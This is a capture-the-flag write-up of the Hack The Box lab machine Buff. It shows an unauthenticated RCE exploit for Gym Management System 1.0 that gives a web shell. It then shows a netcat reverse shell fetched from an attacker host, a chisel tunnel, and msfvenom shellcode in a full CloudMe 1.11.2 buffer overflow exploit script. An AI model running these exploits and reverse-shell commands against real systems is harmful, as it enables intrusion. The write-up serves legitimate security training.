Hack The Box Write-Up Buff - 10.10.10.198
Notoriety wasn’t as good as fame, but was heaps better than obscurity.
Neil Gaiman
About Buff
In this post, I’m writing a write-up for the machine Buff from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills
Buff is a ‘Easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 10 and submitting the root flag you points will be raised by 20.
Foothold
After the initial port scan with Nmap, we can discover one open port 8080/tcp
. Behind this port, there is a web server running with the Gym Management Software version 1.0. This version suffers an unauthenticated Remote Code Execution (RCE) vulnerability.
User
After downloading and running the exploit, we were able to have a web shell on the machine and read the user flag.
Root
In the enumeration, we can find the file CloudMe_1112.exe
in the Downloads
folder. Through searchsploit, we can find that this version suffers a Buffer Overflow (BOF) vulnerability. The application Cloudme is running locally on port 8888/tcp
. To get this exploit working, we need to reverse tunneling this port to our attacker machine and then we can run the exploit to gain a reverse shell as the administrator to root this machine.
Machine Info
Machine Name: | Buff |
Difficulty: | Easy |
Points: | 20 |
Release Date: | 19 Jul 2020 |
IP: | 10.10.10.198 |
Creator: | egotisticalSW |
Recon
Port scan with Nmap
As always we start the box with a Nmap port scan.
1
nmap -sC -sV -oA ./nmap/10.10.10.198 10.10.10.198
The results of the port scan.
1
2
3
4
5
6
7
8
9
10
11
12
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-28 17:36 CEST
Nmap scan report for 10.10.10.198
Host is up (0.021s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.60 seconds
As we can see from the results there is only one open port 8080/tcp
. We can see that there is running an Apache webserver behind this port with a website with the title mrb3n's Bro Hut
.
Enumeration
Enumeration Web Server
We can check the web service running on the HTTP port 8080, by entering the URL http://10.10.10.198:8080
in Firefox. I landed on the homepage of mrb3n's Bro hut
.
On the Contact page we see that the website is made with the Gym Management System 1.0
.
Through searchsploit
, we can search for a known vulnerability in this version of this management system. It seems that this version of the Gym Management software has an Unauthenticated Remote Code Execution vulnerability.
1
2
3
4
5
6
7
8
~$ searchsploit Gym
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection | php/webapps/42801.txt
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Exploitation
Unauthenticated Remote Code Execution
I copied the exploit 48506.py
to my working directory and analyzed the code. Gym Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.
Let’s run the exploit to get a web shell. If you have problems with running this exploit because this exploit wants to run with Python3. I have solved this problem with the steps below. You can also upgrade the exploit to get support for Python 3. But that takes us too long, so we’re going to install pip
for Python 2.7, so that we can install the missing Python 2.7 modules.
First, install pip
for Python2
. To install pip
, we need to download the get-pip.py
Python script.
1
2
3
4
5
6
7
8
9
~$ wget https://bootstrap.pypa.io/get-pip.py
--2020-08-01 04:39:14-- https://bootstrap.pypa.io/get-pip.py
Resolving bootstrap.pypa.io (bootstrap.pypa.io)… 151.101.0.175, 151.101.64.175, 151.101.128.175, …
Connecting to bootstrap.pypa.io (bootstrap.pypa.io)|151.101.0.175|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 1929903 (1.8M) [text/x-python]
Saving to: ‘get-pip.py’
get-pip.py 100%[=====================================================================================================>] 1.84M 1.57MB/s in 1.2s
2020-08-01 04:39:16 (1.57 MB/s) - ‘get-pip.py’ saved [1929903/1929903]
Then we can use Python version 2.7 to call this script. This script detects that it is being run by Python 2.7, and it will then download and install the latest pip
version for Python 2.7.
1
2
3
4
5
6
7
8
9
10
11
12
~$ python2 get-pip.py
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.
Collecting pip<21.0
Downloading pip-20.3.4-py2.py3-none-any.whl (1.5 MB)
|████████████████████████████████| 1.5 MB 1.6 MB/s
Collecting setuptools<45
Downloading setuptools-44.1.1-py2.py3-none-any.whl (583 kB)
|████████████████████████████████| 583 kB 1.7 MB/s
Collecting wheel
Downloading wheel-0.36.2-py2.py3-none-any.whl (35 kB)
Installing collected packages: pip, setuptools, wheel
Successfully installed pip-20.3.4 setuptools-44.1.1 wheel-0.36.2
After pip for Python 2.7 is downloaded and installed, we can download and install the missing modules.
1
2
~$ python -m pip install requests
~$ python -m pip install colorama
The missing modules are installed. We can now run the exploit.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
~$ python 49506.py http://10.10.10.198:8080/
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG
buff\shaun
C:\xampp\htdocs\gym\upload> type C:\users\shaun\desktop\user.txt
�PNG
c23d5206ed1079f3f7466337bab963d2
After running the exploit, we have a web shell, and we can read the user flag. For me, this is the fastest foothold and user flag ever on Hack The Box. The next phase is to do a privilege escalation.
Privilege Escalation
Reverse shell
I have to exit this web shell so that I have more commands at my disposal. I downloaded the nc.exe
to the box and created a reverse shell with PowerShell.
1
2
3
4
C:\xampp\htdocs\gym\upload> powershell -c "curl 10.10.16.144/nc.exe -o nc.exe"
�PNG
C:\xampp\htdocs\gym\upload> nc.exe 10.10.16.144 4444 -e powershell.exe
The reverse shell is established.
1
2
3
4
5
6
7
8
9
10
~$ netcat -lvvp 4444
Listening on any address 4444 (krb524)
whoami
Connection from 10.10.10.198:49794
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
whoami
buff\shaun
PS C:\xampp\htdocs\gym\upload>
The machine Buff is a 64-bits Windows 10 Enterprise
operating system.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
C:\xampp\htdocs\gym\upload> systeminfo
�PNG
Host Name: BUFF
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.17134 N/A Build 17134
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: shaun
Registered Organization:
Product ID: 00329-10280-00000-AA218
Original Install Date: 16/06/2020, 15:05:58
System Boot Time: 29/07/2020, 14:24:20
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
...
After a time of searching, I found the file CloudMe_1112.exe
in the ‘Downloads’ folder of the user Shaun.
1
2
3
4
5
6
7
8
9
10
11
12
13
PS C:\Users\shaun\Downloads> ls
ls
Directory: C:\Users\shaun\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 16/06/2020 16:26 17830824 CloudMe_1112.exe
PS C:\Users\shaun\Downloads>
We can see that the software CloudMe
is installed because the processes are running on this machine.
1
2
3
4
5
6
7
8
9
10
11
PS C:\> get-process
get-process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
430 24 17700 9032 6908 1 ApplicationFrameHost
161 10 1936 2148 7256 1 browser_broker
239 19 25648 29328 316 0 CloudMe
288 36 32832 32 8612 0 CloudMe
45 4 1940 2320 0.00 2876 0 cmd
41 5 2752 3372 4432 0 cmd
If we check the connections on this machine, we see that this machine is listening on port 8888/tcp
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
C:\xampp\htdocs\gym\upload> netstat -anop TCP
�PNG
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 956
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5840
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 8380
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 4512
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 528
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1092
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1592
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2244
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 672
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 688
TCP 10.10.10.198:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.198:8080 10.10.16.101:49614 FIN_WAIT_2 4512
TCP 10.10.10.198:8080 10.10.16.101:49616 ESTABLISHED 4512
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 8092
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 1704
TCP 127.0.0.1:54468 127.0.0.1:3306 TIME_WAIT 0
TCP 127.0.0.1:54470 127.0.0.1:3306 TIME_WAIT 0
We can check searchploit
for CloudMe version 1.1.12
and it seems that this version has a Buffer Overload (BOF) vulnerability.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
~$ searchsploit cloudme
--------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txt
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit) | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) | windows_x86-64/remote/44784.py
--------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
I copied the exploit 48389.py
to my working directory. After analyzing the payload, I can to the conclusion that we have to build a reverse tunnel. I downloaded Chisel 1.6.0, from GitHub: https://github.com/jpillora/chisel/releases/tag/v1.6.0. For my attacking machine, I’ve downloaded chisel_1.6.0_linux_amd64.gz
and for the windows machine, I downloaded chisel_1.6.0_windows_amd64.gz
. Download the chisel_1.1.0.exe
on the machine and start local the chisel server.
We can start the chisel server on the attacker machine with a listener on port 5000
.
1
2
3
4
~$ ./chisel_1.6.0_linux_amd64 server -p 5000 --reverse
2021/02/05 05:16:28 server: Reverse tunnelling enabled
2021/02/05 05:16:28 server: Fingerprint 2c:bc:a2:96:16:a4:07:3e:67:d7:72:2b:aa:68:be:cd
2021/02/05 05:16:28 server: Listening on 0.0.0.0:5000…
After downloding chisel to the buff machine, we can forward port 8888
to our machine.
1
2
3
4
5
6
7
S C:\xampp\htdocs\gym\upload> curl 10.10.16.144/chisel.exe -o chisel.exe
curl 10.10.16.144/chisel.exe -o chisel.exe
PS C:\xampp\htdocs\gym\upload> ./chisel.exe client 10.10.16.144:5000 R:8888:127.0.0.1:8888
./chisel.exe client 10.10.16.144:5000 R:8888:127.0.0.1:8888
2021/02/05 10:33:31 client: Connecting to ws://10.10.16.144:5000
2021/02/05 10:33:32 client: Fingerprint 2c:bc:a2:96:16:a4:07:3e:67:d7:72:2b:aa:68:be:cd
2021/02/05 10:33:33 client: Connected (Latency 191.5351ms)
Exploitation with Buffer Overflow
We can now create a reverse shell payload with msfvenom
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
~$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.144 LPORT=5555 EXITFUNC=thread -b "\x00\x0d\x0a" -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1869 bytes
payload = b""
payload += b"\xba\xdf\x45\x75\x98\xdb\xc2\xd9\x74\x24\xf4\x58"
payload += b"\x31\xc9\xb1\x52\x31\x50\x12\x83\xc0\x04\x03\x8f"
payload += b"\x4b\x97\x6d\xd3\xbc\xd5\x8e\x2b\x3d\xba\x07\xce"
payload += b"\x0c\xfa\x7c\x9b\x3f\xca\xf7\xc9\xb3\xa1\x5a\xf9"
payload += b"\x40\xc7\x72\x0e\xe0\x62\xa5\x21\xf1\xdf\x95\x20"
payload += b"\x71\x22\xca\x82\x48\xed\x1f\xc3\x8d\x10\xed\x91"
payload += b"\x46\x5e\x40\x05\xe2\x2a\x59\xae\xb8\xbb\xd9\x53"
payload += b"\x08\xbd\xc8\xc2\x02\xe4\xca\xe5\xc7\x9c\x42\xfd"
payload += b"\x04\x98\x1d\x76\xfe\x56\x9c\x5e\xce\x97\x33\x9f"
payload += b"\xfe\x65\x4d\xd8\x39\x96\x38\x10\x3a\x2b\x3b\xe7"
payload += b"\x40\xf7\xce\xf3\xe3\x7c\x68\xdf\x12\x50\xef\x94"
payload += b"\x19\x1d\x7b\xf2\x3d\xa0\xa8\x89\x3a\x29\x4f\x5d"
payload += b"\xcb\x69\x74\x79\x97\x2a\x15\xd8\x7d\x9c\x2a\x3a"
payload += b"\xde\x41\x8f\x31\xf3\x96\xa2\x18\x9c\x5b\x8f\xa2"
payload += b"\x5c\xf4\x98\xd1\x6e\x5b\x33\x7d\xc3\x14\x9d\x7a"
payload += b"\x24\x0f\x59\x14\xdb\xb0\x9a\x3d\x18\xe4\xca\x55"
payload += b"\x89\x85\x80\xa5\x36\x50\x06\xf5\x98\x0b\xe7\xa5"
payload += b"\x58\xfc\x8f\xaf\x56\x23\xaf\xd0\xbc\x4c\x5a\x2b"
payload += b"\x57\x79\x91\x23\x37\x15\xa7\x43\x22\x55\x2e\xa5"
payload += b"\x26\x89\x67\x7e\xdf\x30\x22\xf4\x7e\xbc\xf8\x71"
payload += b"\x40\x36\x0f\x86\x0f\xbf\x7a\x94\xf8\x4f\x31\xc6"
payload += b"\xaf\x50\xef\x6e\x33\xc2\x74\x6e\x3a\xff\x22\x39"
payload += b"\x6b\x31\x3b\xaf\x81\x68\x95\xcd\x5b\xec\xde\x55"
payload += b"\x80\xcd\xe1\x54\x45\x69\xc6\x46\x93\x72\x42\x32"
payload += b"\x4b\x25\x1c\xec\x2d\x9f\xee\x46\xe4\x4c\xb9\x0e"
payload += b"\x71\xbf\x7a\x48\x7e\xea\x0c\xb4\xcf\x43\x49\xcb"
payload += b"\xe0\x03\x5d\xb4\x1c\xb4\xa2\x6f\xa5\xd4\x40\xa5"
payload += b"\xd0\x7c\xdd\x2c\x59\xe1\xde\x9b\x9e\x1c\x5d\x29"
payload += b"\x5f\xdb\x7d\x58\x5a\xa7\x39\xb1\x16\xb8\xaf\xb5"
payload += b"\x85\xb9\xe5"
I can now place the payload in the exploit script. After the modification of the exploit, we got left with this script.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
# msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b""
payload += b"\xba\xdf\x45\x75\x98\xdb\xc2\xd9\x74\x24\xf4\x58"
payload += b"\x31\xc9\xb1\x52\x31\x50\x12\x83\xc0\x04\x03\x8f"
payload += b"\x4b\x97\x6d\xd3\xbc\xd5\x8e\x2b\x3d\xba\x07\xce"
payload += b"\x0c\xfa\x7c\x9b\x3f\xca\xf7\xc9\xb3\xa1\x5a\xf9"
payload += b"\x40\xc7\x72\x0e\xe0\x62\xa5\x21\xf1\xdf\x95\x20"
payload += b"\x71\x22\xca\x82\x48\xed\x1f\xc3\x8d\x10\xed\x91"
payload += b"\x46\x5e\x40\x05\xe2\x2a\x59\xae\xb8\xbb\xd9\x53"
payload += b"\x08\xbd\xc8\xc2\x02\xe4\xca\xe5\xc7\x9c\x42\xfd"
payload += b"\x04\x98\x1d\x76\xfe\x56\x9c\x5e\xce\x97\x33\x9f"
payload += b"\xfe\x65\x4d\xd8\x39\x96\x38\x10\x3a\x2b\x3b\xe7"
payload += b"\x40\xf7\xce\xf3\xe3\x7c\x68\xdf\x12\x50\xef\x94"
payload += b"\x19\x1d\x7b\xf2\x3d\xa0\xa8\x89\x3a\x29\x4f\x5d"
payload += b"\xcb\x69\x74\x79\x97\x2a\x15\xd8\x7d\x9c\x2a\x3a"
payload += b"\xde\x41\x8f\x31\xf3\x96\xa2\x18\x9c\x5b\x8f\xa2"
payload += b"\x5c\xf4\x98\xd1\x6e\x5b\x33\x7d\xc3\x14\x9d\x7a"
payload += b"\x24\x0f\x59\x14\xdb\xb0\x9a\x3d\x18\xe4\xca\x55"
payload += b"\x89\x85\x80\xa5\x36\x50\x06\xf5\x98\x0b\xe7\xa5"
payload += b"\x58\xfc\x8f\xaf\x56\x23\xaf\xd0\xbc\x4c\x5a\x2b"
payload += b"\x57\x79\x91\x23\x37\x15\xa7\x43\x22\x55\x2e\xa5"
payload += b"\x26\x89\x67\x7e\xdf\x30\x22\xf4\x7e\xbc\xf8\x71"
payload += b"\x40\x36\x0f\x86\x0f\xbf\x7a\x94\xf8\x4f\x31\xc6"
payload += b"\xaf\x50\xef\x6e\x33\xc2\x74\x6e\x3a\xff\x22\x39"
payload += b"\x6b\x31\x3b\xaf\x81\x68\x95\xcd\x5b\xec\xde\x55"
payload += b"\x80\xcd\xe1\x54\x45\x69\xc6\x46\x93\x72\x42\x32"
payload += b"\x4b\x25\x1c\xec\x2d\x9f\xee\x46\xe4\x4c\xb9\x0e"
payload += b"\x71\xbf\x7a\x48\x7e\xea\x0c\xb4\xcf\x43\x49\xcb"
payload += b"\xe0\x03\x5d\xb4\x1c\xb4\xa2\x6f\xa5\xd4\x40\xa5"
payload += b"\xd0\x7c\xdd\x2c\x59\xe1\xde\x9b\x9e\x1c\x5d\x29"
payload += b"\x5f\xdb\x7d\x58\x5a\xa7\x39\xb1\x16\xb8\xaf\xb5"
payload += b"\x85\xb9\xe5"
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
print(sys.exc_value)
The only thing we have to do, is make sure that your netcat
is listening on port 5555
and then run the payload.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
~$ python 48389.py
Reverse shell is established and we can own Buff.
~$ nc -lvvp 5555
listening on [any] 5555 …
10.10.10.198: inverse host lookup failed: Unknown host
connect to [10.10.16.144] from (UNKNOWN) [10.10.10.198] 49681
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
9dac8c83a3f6da218fb334836a7bdf1b
C:\Windows\system32>
Thanks for reading this write-up. This write-up and the machine Buff, can be used for your preperation for the OCSP exam. I hope in the future to write a blog post about OCSP and how you can prepare for the OCSP. But first, I have to do the OCSP by myself 🙂
If you like this write-up, please consider spending a respect point, my HTB profile: https://app.hackthebox.eu/profile/224856.
Happy Hacking :-)